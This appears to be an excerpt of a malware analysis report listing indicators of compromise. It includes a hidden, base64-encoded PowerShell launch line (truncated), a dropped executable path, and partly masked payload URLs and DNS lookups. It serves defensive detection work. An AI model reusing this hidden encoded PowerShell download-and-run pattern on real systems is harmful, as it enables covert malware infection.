Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABFAHMAdABmAHcAcgBuAGMAeQBvAHgAPQAnAE4AcgBsAHQAZwBrAGsAcwAnADsAJABEAHQAagBwAHcAbQBrAHcAdAAgAD0AIAAnADIANwA2ACcAOwAkAEMAeABnAHYAaABtAG8AawBzAD0AJwBTAGsAbABlAHg...
- %HOMEPATH%\276.exe
- http://za####olidays.me/api.mud/oyokx-xih3-8811/
- http://ja#####ndevelopers.com/wp-content/m9yufwg62-ivbak8-8431/
- http://ja#####ndevelopers.com/cgi-sys/suspendedpage.cgi
- http://www.sh#####leighbeauty.com/subscription/9qtkw7-57djmwa46x-074306828/
- DNS ASK za####olidays.me
- DNS ASK ja#####ndevelopers.com
- DNS ASK sh#####leighbeauty.com
- DNS ASK pi###seed.com
- DNS ASK ma###scakes.com